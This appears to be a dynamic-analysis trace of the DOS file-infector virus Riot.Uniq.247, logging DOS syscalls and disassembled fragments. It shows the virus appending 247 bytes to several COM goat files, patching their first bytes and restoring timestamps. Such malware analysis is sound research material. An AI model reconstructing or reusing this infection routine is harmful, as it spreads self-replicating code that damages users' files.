
vx.netlux.org/Virus.DOS.Riot.Uniq.247


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-17T21:53:49.821401895Z 26 PC: 13e83 | Set disk transfer address
2018-12-17T21:53:49.823554037Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.825835683Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-17T21:53:49.828362786Z 78 PC: 13e92 | Find first file
2018-12-17T21:53:49.834447825Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.85137015Z 61 PC: 13ec0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:53:49.863395988Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.86506324Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.876130663Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:49.877537565Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:49.87978246Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:49.888728754Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:49.890056786Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:49.896497038Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:49.906077417Z 62 PC: 13f18 | Close file
2018-12-17T21:53:49.914077264Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:49.916642259Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.927090597Z 61 PC: 13ec0 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:53:49.933926467Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.935657893Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.945210471Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:49.947001789Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:49.949567486Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:49.952894542Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:49.956235661Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:49.958985322Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:49.960598171Z 62 PC: 13f18 | Close file
2018-12-17T21:53:49.968714732Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:49.971673081Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:49.981519913Z 61 PC: 13ec0 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:53:49.98948957Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:49.991567562Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:49.99818436Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.001170997Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.003627256Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.006743827Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.009165283Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.012399194Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.014196867Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.021914001Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.02556075Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.035386528Z 61 PC: 13ec0 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:53:50.042658356Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.045218907Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.051721666Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.053221036Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.056653118Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.061672826Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.063239541Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.066716365Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.068702872Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.076475098Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.079475274Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.089912968Z 61 PC: 13ec0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:53:50.096579912Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.098153334Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.106273671Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.108675945Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.110901766Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.114647984Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.115929547Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.118517479Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.125014668Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.132106522Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.1345857Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.144990762Z 61 PC: 13ec0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:53:50.151445864Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.152896945Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.160141206Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.161345687Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.163838411Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.172971518Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.17442897Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.181233482Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.18319317Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.191385627Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.193861408Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.204241832Z 61 PC: 13ec0 | Open file (Filename = 'PAH.COM')
2018-12-17T21:53:50.210877684Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.212163715Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.219576807Z 66 PC: 13ee4 | Move file pointer
2018-12-17T21:53:50.221284663Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-17T21:53:50.223960433Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-17T21:53:50.227447651Z 66 PC: 13f02 | Move file pointer
2018-12-17T21:53:50.229240354Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:53:50.231892782Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.234894723Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.24279609Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.245842677Z 67 PC: 13ebb | Get or set file attributes
2018-12-17T21:53:50.25644042Z 61 PC: 13ec0 | Open file (Filename = 'TEST.COM')
2018-12-17T21:53:50.263208795Z 87 PC: 13ec8 | Get or set file date and time
2018-12-17T21:53:50.264479083Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:53:50.267685362Z 87 PC: 13f14 | Get or set file date and time
2018-12-17T21:53:50.269773395Z 62 PC: 13f18 | Close file
2018-12-17T21:53:50.276929203Z 79 PC: 13e92 | Find next file
2018-12-17T21:53:50.279739534Z 44 PC: 13e9f | Get time 0x13e9f: cmp dl, 2
0x13ea2: ja 0x13ea4
0x13ea4: mov dx, 0x80
0x13ea7: mov ah, 0x1a
0x13ea9: int 0x21
0x13eab: mov di, 0x100
0x13eae: push di
0x13eaf: ret
0x13eb0: lea dx, word ptr [bp + 0x215]
0x13eb4: mov ax, 0x4301
0x13eb7: xor cx, cx
0x13eb9: int 0x21
0x13ebb: mov ax, 0x3d02
0x13ebe: int 0x21
0x13ec0: jb 0x13f18
0x13ec2: xchg ax, bx
0x13ec3: mov ax, 0x5700
0x13ec6: int 0x21
0x13ec8: push cx
0x13ec9: push dx
2018-12-17T21:53:50.282521024Z 26 PC: 13eab | Set disk transfer address
2018-12-17T21:53:50.284352507Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T21:53:50.290132228Z 0 PC: 12a89 | Program terminate

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":410,"SideJobID":0}


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:40:52.517484464Z 26 PC: 13e83 | Set disk transfer address
2018-12-25T11:40:52.51965826Z 67 PC: 13ebb | Get or set file attributes
2018-12-25T11:40:52.521573641Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-25T11:40:52.531355228Z 78 PC: 13e92 | Find first file
2018-12-25T11:40:52.538286658Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.55438636Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.56135656Z 87 PC: 13ec8 | Get or set file date and time
2018-12-25T11:40:52.562543731Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:40:52.569046243Z 66 PC: 13ee4 | Move file pointer
2018-12-25T11:40:52.570426638Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-25T11:40:52.572487356Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-25T11:40:52.580849801Z 66 PC: 13f02 | Move file pointer
2018-12-25T11:40:52.582054647Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:40:52.588223461Z 87 PC: 13f14 | Get or set file date and time
2018-12-25T11:40:52.589825671Z 62 PC: 13f18 | Close file
2018-12-25T11:40:52.598195265Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.599844836Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.606934842Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.613688198Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.615272926Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.622253468Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.623598294Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.625714803Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.628483835Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.629838825Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.632329157Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.634094349Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.641677898Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.644216162Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.653999063Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.660485487Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.661810417Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.668482076Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.669831305Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.672067893Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.675321347Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.676628303Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.679031244Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.680920434Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.688074269Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.690603819Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.701017579Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.712522229Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.713810438Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.720020904Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.721144351Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.722571852Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.724406448Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.725727282Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.727362608Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.728503749Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.733487673Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.73530681Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.741747343Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.746282703Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.747450072Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.753399546Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.754670172Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.756712366Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.759417953Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.760670167Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.763006939Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.764296805Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.771722054Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.774870845Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.784383947Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.79088303Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.792075765Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.798525735Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.800258358Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.802690881Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.811042154Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.812944443Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.81938271Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.821080612Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.829164792Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.831832006Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.841525168Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.848084404Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.84924393Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.855313044Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.857432309Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.859799798Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.862788438Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.865237732Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.867969166Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.869578976Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.877231442Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.879846977Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.889290114Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.896728841Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.897913806Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.904398192Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.906528427Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.913491346Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.916270015Z 44 PC: 13e9f | Get time 0x13e9f: cmp dl, 2
0x13ea2: ja 0x13ea4
0x13ea4: mov dx, 0x80
0x13ea7: mov ah, 0x1a
0x13ea9: int 0x21
0x13eab: mov di, 0x100
0x13eae: push di
0x13eaf: ret
0x13eb0: lea dx, word ptr [bp + 0x215]
0x13eb4: mov ax, 0x4301
0x13eb7: xor cx, cx
0x13eb9: int 0x21
0x13ebb: mov ax, 0x3d02
0x13ebe: int 0x21
0x13ec0: jb 0x13f18
0x13ec2: xchg ax, bx
0x13ec3: mov ax, 0x5700
0x13ec6: int 0x21
0x13ec8: push cx
0x13ec9: push dx
2018-12-25T11:40:52.919184902Z 26 PC: 13eab | Set disk transfer address
2018-12-25T11:40:52.92044534Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:40:52.926050136Z 0 PC: 12a89 | Program terminate

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":410,"SideJobID":0}


Syscalls:

Time | Syscall Op | PC | Syscall Name
2018-12-25T11:40:52.621572125Z 26 PC: 13e83 | Set disk transfer address
2018-12-25T11:40:52.623576285Z 67 PC: 13ebb | Get or set file attributes
2018-12-25T11:40:52.625441905Z 61 PC: 13ec0 | Open file (Filename = 'e:\infectme.com')
2018-12-25T11:40:52.627680453Z 78 PC: 13e92 | Find first file
2018-12-25T11:40:52.634029008Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.649759045Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.661025602Z 87 PC: 13ec8 | Get or set file date and time
2018-12-25T11:40:52.662883364Z 63 PC: 13ed5 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:40:52.669593854Z 66 PC: 13ee4 | Move file pointer
2018-12-25T11:40:52.670909107Z 44 PC: 13eef | Get time 0x13eef: add dl, dh
0x13ef1: je 0x13eeb
0x13ef3: mov word ptr [bp + 0x10d], bx
0x13ef7: call 0x23e4f
0x13efa: mov ax, 0x4200
0x13efd: sub cx, cx
0x13eff: cdq
0x13f00: int 0x21
0x13f02: mov ah, 0x40
0x13f04: mov cx, 4
0x13f07: lea dx, word ptr [bp + 0x1ef]
0x13f0b: int 0x21
0x13f0d: pop dx
0x13f0e: pop cx
0x13f0f: mov ax, 0x5701
0x13f12: int 0x21
0x13f14: mov ah, 0x3e
0x13f16: int 0x21
0x13f18: ret
0x13f19: cmp bl, byte ptr gs:[si + 0x69]
2018-12-25T11:40:52.673308508Z 64 PC: 13e5d | Write file or device (Write 247 bytes on handle 5)
2018-12-25T11:40:52.681761129Z 66 PC: 13f02 | Move file pointer
2018-12-25T11:40:52.683153682Z 64 PC: 13f0d | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:40:52.68956388Z 87 PC: 13f14 | Get or set file date and time
2018-12-25T11:40:52.692019901Z 62 PC: 13f18 | Close file
2018-12-25T11:40:52.699625882Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.702320864Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.712314176Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.718900816Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.720588425Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.727688594Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.729573555Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.732132505Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.735836937Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.738316001Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.740915488Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.743359325Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.759136999Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.762877735Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.774854065Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.781729559Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.783463755Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.790738202Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.79258123Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.794703988Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.79793512Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.799337616Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.801836536Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.803938628Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.811107976Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.813639814Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.824283789Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.831511605Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.83321509Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.839876587Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.841103339Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.843132814Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.846390927Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.847689735Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.850112964Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.851682953Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.859119722Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.861546677Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.871006644Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.876118457Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.877394559Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.881574099Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.882814563Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.884495571Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.887925446Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.889626411Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.892021081Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.893320849Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.900878063Z 79 PC: 13e92 | Find next file (See above)
2018-12-25T11:40:52.90334943Z 67 PC: 13ebb | Get or set file attributes (See above)
2018-12-25T11:40:52.912672659Z 61 PC: 13ec0 | Open file (See above)
2018-12-25T11:40:52.919315323Z 87 PC: 13ec8 | Get or set file date and time (See above)
2018-12-25T11:40:52.920690154Z 63 PC: 13ed5 | Read file or device (See above)
2018-12-25T11:40:52.926749852Z 66 PC: 13ee4 | Move file pointer (See above)
2018-12-25T11:40:52.928610136Z 44 PC: 13eef | Get time (See above)
2018-12-25T11:40:52.930613408Z 64 PC: 13e5d | Write file or device (See above)
2018-12-25T11:40:52.936600638Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T11:40:52.938808276Z 64 PC: 13f0d | Write file or device (See above)
2018-12-25T11:40:52.945084406Z 87 PC: 13f14 | Get or set file date and time (See above)
2018-12-25T11:40:52.94646076Z 62 PC: 13f18 | Close file (See above)
2018-12-25T11:40:52.954761322Z 79 PC: 13e92 | Find next file (See above)
